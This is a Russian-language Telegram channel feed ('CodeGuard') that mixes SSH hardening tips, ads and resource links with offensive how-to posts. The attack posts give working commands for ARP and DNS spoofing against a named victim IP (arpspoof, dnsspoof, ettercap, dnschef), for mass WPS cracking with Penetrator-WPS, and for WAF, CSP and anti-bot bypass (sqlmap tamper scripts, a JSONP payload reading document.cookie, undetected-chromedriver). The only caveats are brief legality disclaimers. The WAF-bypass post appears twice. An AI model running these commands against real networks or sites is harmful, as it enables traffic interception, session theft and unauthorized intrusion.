CodeGuard: CyberSec Edition

🔥 Лучшие каналы по кодингу Зайди в любой из них и убедись в этом сам! 🥶 Hacking - t.me/indigo_hack 👊 Linux & Bash - t.me/linux_bash 👩‍💻 Web - t.me/indigo_web 👩‍💻 Python - t.me/indigo_python База знаний - Здесь (открыто) 🔥 Не упусти шанс стать частью нашего сообщества ⚡️

👩‍💻 Криптография для практиков: Защищаем переписку по SSH с примерами команд SSH — не только безопасный протокол, но и набор мощных инструментов для надежной защиты удаленного взаимодействия. Давайте подробно разберем, как конфигурировать SSH и использовать его возможности для шифрования и аутентификации. 👉 1. Генерация ключей и базовая настройка Создаем пару ключей Ed25519 с паролем для шифрования личного ключа:

ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"

Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования. Копируем публичный ключ на сервер:

ssh-copy-id user@server

🖥 2. Настройка SSH клиента для удобства и безопасности Правим файл ~/.ssh/config:

Host myserver
    HostName server.example.com
    User user
    Port 2222
    IdentityFile ~/.ssh/id_ed25519
    IdentitiesOnly yes

Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й. ⚙️ 3. Отключение паролей для повышения безопасности На сервере редактируем /etc/ssh/sshd_config:

PasswordAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
Port 2222

Делаем резервную копию файла перед изменением и перезапускаем SSH:

sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd

🐳 4. Использование шифров и алгоритмов Для контроля алгоритмов добавим в ~/.ssh/config:

Host myserver
    Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
    KexAlgorithms curve25519-sha256

Ограничение по криптографии улучшает защиту от устаревших и слабых методов. 📌 5. Включение двухфакторной аутентификации (2FA) Устанавливаем Google Authenticator на сервер:

sudo apt install libpam-google-authenticator
google-authenticator

Добавляем в /etc/pam.d/sshd строку:

auth required pam_google_authenticator.so

И в sshd_config:

ChallengeResponseAuthentication yes
AuthenticationMethods publickey,keyboard-interactive

Перезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps

📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016

Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨‍💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest

💬 Давайте общаться! У нас есть уютный чат для вопросов, новостей и обмена опытом — все дружелюбной атмосфере. p.s а еще у нас там архив с книгами, курсами и т.п 🌡 https://t.me/+t_SZROs0Gj4wYTFi Присоединяйтесь и становитесь частью нашего сообщества. Ждём вас! 😈 CodeGuard | Chat

🤔 Kali Pi-Tail на Raspberry Pi Zero — портативный хакер в вашем кармане Используйте Kali Linux на Raspberry Pi Zero 2 W для создания компактного устройства для пентеста и кибербезопасности. В статье показано, как установить и настроить Kali Pi-Tail в headless-режиме — без экрана, с питанием и управлением через смартфон по SSH или VNC. Такой девайс отлично подходит для мобильного аудита безопасности и тестирования сетей. 🔗 Инструкция по установке 😈 CodeGuard | Chat

⚠️ Крупнейшей библиотеки хакинга Practical Ethical Hacking Resources Если хотите получить самое полное образование и базу для пентеста, обратите внимание на репозиторий Practical Ethical Hacking Resources от TCM-Course-Resources.

Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити

📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource

🔍 Цифровой след: как управлять своей репутацией в сети Цифровая репутация — это совокупность ваших публикаций, комментариев, отзывов, профилей в соцсетях, упоминаний в СМИ и данных в открытых источниках. Репутация напрямую влияет на доверие аудитории, развитие бизнеса и личный образ в сети. 📌 Рекомендации: - Используйте SERM (Search Engine Reputation Management) для управления выдачей в поисковых системах - Вовлекайте лояльную аудиторию к формированию положительного контента - Быстро отвечайте на негатив, минимизируйте его последствия - Применяйте специализированные инструменты для сбора и анализа отзывов 🔗 Разбор в статье SecurityLab Управляйте своим цифровым следом осознанно и не позволяйте случайностям формировать ваш имидж в сети 😈 CodeGuard | Chat | #digitalreputation #onlinereputation #security

👩‍💻 Кодер — не профессия, а образ мышления 👩‍💻 Программист — это не тот, кто знает синтаксис. Это тот, кто видит решение там, где другие видят хаос. 👩‍💻 Python — язык, который раскрывает логику, а не пугает ею. 💪 Присоединяйся и начинай думать PythonCrafting

😈 Перехват и подделка DNS-трафика — кейсы с командами DNS нацелены на перевод имён в IP, и их подмена даёт полный контроль над трафиком. Вот рабочие инструменты и команды для перехвата и spoofing на Linux. 🔥 dnsspoof — легкий инструмент для перехвата и подмены DNS в локальной сети:

sudo apt install dsniff

# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1

# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt

Содержимое hosts.txt:

example.com 1.2.3.4

🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:

sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof

- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS. 🛜 dnschef — DNS-прокси для легкой подмены:

sudo apt install python3-pip
pip3 install dnschef

sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com

Всё, что запросит example.com — получит 5.6.7.8.

⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств

📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat

✉️ Атака через USB-порт: PoisonTap PoisonTap — компактное устройство на базе Raspberry Pi Zero, способное атаковать компьютер через USB-порт. Работает даже на заблокированных машинах, что делает его особенно опасным для пользователей с паролями. Как это работает: при подключении PoisonTap маскируется под Ethernet-адаптер и перехватывает DHCP-запросы ОС. Весь исходящий компьютерный трафик проходит через него, позволяя захватывать и изменять данные.

🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.

Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat

🌐Технологии, которые держат мир на связи. Как выглядит современный Wi-Fi и что влияет на его безопасность Привет, участникам CodeGuard! На связи команда PT Cyber Analytics. Мы подготовили для вас материал по устройству и безопасности современных беспроводных сетей. В его основе — результаты проведенных проектов и экспертиза наших исследователей. Представьте, что вы вернулись в 1995 год. Там, где вместо гигабитных скоростей — dial-up, вместо Netflix — видеокассеты, а Wi-Fi — это магия, передающая данные со скоростью всего лишь 1–2 Мбит/с. Сейчас все иначе: беспроводные сети — от домашнего Wi-Fi до корпоративных инфраструктур, поддерживающих сотни устройств одновременно, — стали неотъемлемой частью нашей цифровой жизни. ✅ Читать полностью на Хабре 😈 CodeGuard | Chat

Утилита для атаки на Wi-Fi — Penetrator-WPS Penetrator-WPS — консольная утилита для атаки на WPS (Wi-Fi Protected Setup). Она позволяет в реальном времени атаковать множество беспроводных точек доступа с включённым WPS. 🔍 Работает через атаку Pixie Dust — автономный метод взлома протокола WPS, который помогает получить доступ к паролям роутеров. Для работы требуется установленная утилита PixieWPS.

🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей

📥 Установка (пример для Kali Linux):

apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator

🚀 Примеры запуска: — Ручная атака на конкретные цели:

penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11

— Сканирование и атака всех точек на канале 1:

penetrator -i wlan0 -c 1

— Атака всех доступных точек с WPS с использованием Pixie Dust:

penetrator -i wlan0 -A

— Последовательная атака поочерёдно всех точек с WPS:

penetrator -i wlan0 -A -M

⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение 📂 Репозиторий на GitHub 😈 CodeGuard | Chat

🌍 90-дневный план обучения кибербезопасности Репозиторий с подробным 90-дневным планом изучения кибербезопасности от Farhan Ashraf

👩‍💻 Весь курс разбит на ежедневные задачи с ресурсами и материалами. Темы охватывают: — Network+ (основы сетей) — Security+ (принципы безопасности) — Linux (основы и командная строка) — Python (для задач безопасности) — Анализ сетевого трафика — Git (контроль версий) — ELK (логирование и аналитика) — Облачные платформы: GCP, AWS, Azure — Хакинг (этичный и практический) — Составление резюме и поиск работы

Это структурированный и удобный план для любого уровня, помогающий системно осваивать ключевые навыки ИБ. 📱 План обучения 😈 CodeGuard | Chat

BEZ PRAVOK 2025: Главная вечеринка креативной индустрии Для всех, кто даёт, получает, вносит, исправляет и недолюбливает правки. Вечеринка легендарная: разработчики, продакты, дизайнеры, аналитики, бренд-менеджеры, продюсеры, стратеги, креаторы... Без лекций, дискуссий, организованного нетворкинга и прочего «полезного» бреда. Только качественная туса с топовой музыкой и понимающими людьми. Посмотреть красивый сайт события 10 часов свежей электронной музыки на 4 сценах, огромный танцпол для любителей рейвов и уютные чилл-ауты для разговоров. Музыку играют: • (dj set) Юрий Усачев (Гости из будущего) • (live) Директор Всего + SP4K • (dj set) Natasha Bai • (dj set) Street Choice • (dj set) DJ Bayk • ...И другие отличные артисты, которые пока под TBA Организаторы: визионерская дизайн-компания Beta Disrupt® Твой бесплатный билет тут: https://t.me/bezpravok_ticket_bot?utm_source=telegain&utm_medium=cpp&utm_campaign=nowaq-kampaniq-ot-28-10-2025&utm_content=+3X56uL4A-UM3Njgy&utm_term=133d5aa4f87d2125ad756e4e&erid=2W5zFJAPZbn Увидимся 21 ноября в AG Loft🔥

🖥 Методы обхода защитных механизмов веб-приложений: практические шаги и команды Современные веб-приложения защищены целым набором механизмов — WAF, CSP, антиботы, API-ограничения. Но опытные пентестеры знают, как их обходить, чтобы провести полноценный аудит безопасности. ⚡️ Шаг 1. Обход WAF с помощью SQLMap и кастомных tamper-скриптов

sqlmap -u "https://example.com/product?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3

- space2comment заменяет пробелы на комментарии SQL, запутывая фильтры - chardoubleencode — двойное кодирование символов - between — альтернативные выражения для операторов Это помогает преодолеть базовую фильтрацию WAF. ⚡️ Шаг 2. Обход CSP (Content Security Policy) с помощью JSONP и Mutation XSS Пример обхода через JSONP:

<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>

Mutation XSS позволяет выполнять полезный скрипт, несмотря на строгую CSP благодаря манипуляциям с DOM. ⚡️ Шаг 3. Обход Cloudflare и антиботов с помощью SeleniumBase и undetected-chromedriver Python пример:

from seleniumbase import Driver

driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()

Используйте undetected-chromedriver, чтобы браузер маскировался под обычного пользователя и проходил защиту Cloudflare. ⚡️ Шаг 4. Кастомные payloadы с AI и Mutation XSS для обхода современных WAF Генерируйте "шумовые" запросы, частично похожие на легитимные, чтобы запутать эвристику фильтров. 📂 Подробнее: probtoplay.com, codeby.net и еще статья на codeby.net 😈 CodeGuard | Chat

✅ Когда ваш ИИ-браузер становится вашим врагом: катастрофа безопасности Comet. Мнение колумниста Venture Beat Помните времена, когда браузеры были простыми? Нажимаешь на ссылку — страница загружается, может, заполняешь форму, и всё. Теперь ситуация изменилась: ИИ-браузеры вроде Comet от Perplexity обещают сделать всё за вас — кликать, печатать, думать и даже выбирать. Но вот неожиданный поворот: этот «умный» ассистент, который помогает вам в интернете, может выполнять приказы самих сайтов, от которых должен вас защищать. Недавний провал безопасности Comet — не просто позорный случай, а учебник по тому, как не нужно строить ИИ-продукты. 📁 Перейти к статье 😈 CodeGuard | Chat

👨‍✈️ Cyber Security вакансии всех грейдов: удалёнка, реклок, щедрый оффер! Только с прямыми контактами в Telegram! Ноль автоотказов — живой диалог и быстрые объективные решения. 👨‍✈️ CyberSec 👩‍💻 Python 👩‍💻 Java 👣 Go 🤖 ML & DS 👩‍💻 DevOps 🔎 QA 👩‍💻 Frontend 👩‍💻 Node.js 🖥 SQL 👩‍💻 UX/UI 🖼️ PHP 👩‍💻 Mobile 📋 Analyst 💼 1C 👩‍💻 C# 👩‍💻 IT HR Подпишись чтобы не упустить свой шанс получить лучший оффер!

🔥 Кейсы успешной эксплуатации уязвимостей zero-day: уроки от лидеров кибербезопасности Уязвимости нулевого дня (zero-day) — «дыры» в ПО, о которых никто не знает и нет патчей. Злоумышленники эксплуатируют их, нанося серьезный ущерб. Вот некоторые значимые кейсы из истории и современности. 🚀 Stuxnet Один из первых и самых известных кейсов. Червь Stuxnet использовал четыре zero-day уязвимости в Windows для атаки на иранские ядерные объекты. Это была государственная операция с целью саботажа производственных процессов, которая показала силу кибервойн. 💥 Heartbleed Уязвимость в OpenSSL (CVE-2014-0160) позволяла воровать закрытые ключи и пароли прямо из памяти серверов. Она осталась незамеченной до момента атак на множество сервисов и вызвала повсеместные обновления безопасности. 🛡 Взлом Sony Pictures Хакеры применили zero-day эксплойты для проникновения в сеть Sony. В результате произошла утечка конфиденциальных данных и серьезный урон репутации компании. ⚠️ WannaCry Использовал уязвимость SMB протокола Windows (EternalBlue), которая была zero-day до патча. Вирус-вымогатель заразил 300 тыс. компьютеров по всему миру, парализовав больницы, компании и госструктуры. ✅ Вывод: zero-day уязвимости — это серьезнейшая угроза, требующая постоянного мониторинга, своевременных обновлений и многослойной защиты. 😈 CodeGuard | Chat | #ZeroDay #infosec

👩‍💻 Методы обхода защитных механизмов веб-приложений: практические примеры и инструкции Защитные механизмы, такие как WAF, CSP и антиботы, усложняют тестирование безопасности веб-приложений. Ниже пошаговые техники обхода с примерами команд и инструментов. 🔥 Шаг 1. Обход WAF при помощи SQLMap с tamper-скриптами

sqlmap -u "https://example.com/page?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3

- space2comment меняет пробелы в запросах на SQL-комментарии, запутывая фильтры - Позволяет обойти стандартные фильтры WAF и выполнить SQL-инъекции 🟫 Шаг 2. Обход CSP и XSS-защиты через Mutation XSS и JSONP

<script src="https://trusted.cdn.com/api?callback=alert(document.cookie)//"></script>

- Используется JSONP-запрос, разрешённый политиками CSP, для выполнения скриптов - Mutation XSS позволяет модифицировать DOM, обходя CSP 🐳 Шаг 3. Обход Cloudflare и антиботов с Selenium и undetected-chromedriver Пример на Python:

from seleniumbase import Driver
driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()

- Маскирует браузер, позволяя проходить сложные антибот-механизмы ⚡️ Шаг 4. Кастомные AI-сгенерированные payloadы и шумовые HTTP-запросы - Генерация запросов, частично похожих на легитимные, для обмана эвристики WAF - Использование Mutation XSS с динамическими изменениями содержимого

📚 Для самых жестких: — Ru-brightdata.com — Codeby.net

Эти методы помогут провести полный, незаметный аудит веб-безопасности и выявить скрытые уязвимости 😈 CodeGuard | Chat

🆕⚡️🆕 Прокачай скиллы до PRO уровня В каждом канале собраны лучшие материалы для профессионального роста: ⌨️ Pro Python – от основ до ML и Data Science ⚙ Pro DevOps | Linux – автоматизация, облака, администрирование ⌨️ Pro Java – промышленная разработка и фреймворки 👩‍💻 Pro Go – высоконагруженные системы и микросервисы ⌨️ Pro Kotlin – мобильная и кроссплатформенная разработка 🖥 Pro JavaScript – полный стек ⚙ Pro Backend – архитектура, базы данных, API 🖥 Pro Frontend – современные фреймворки и инструменты Подписывайся на каждый сейчас, смотреть будешь потом! 👍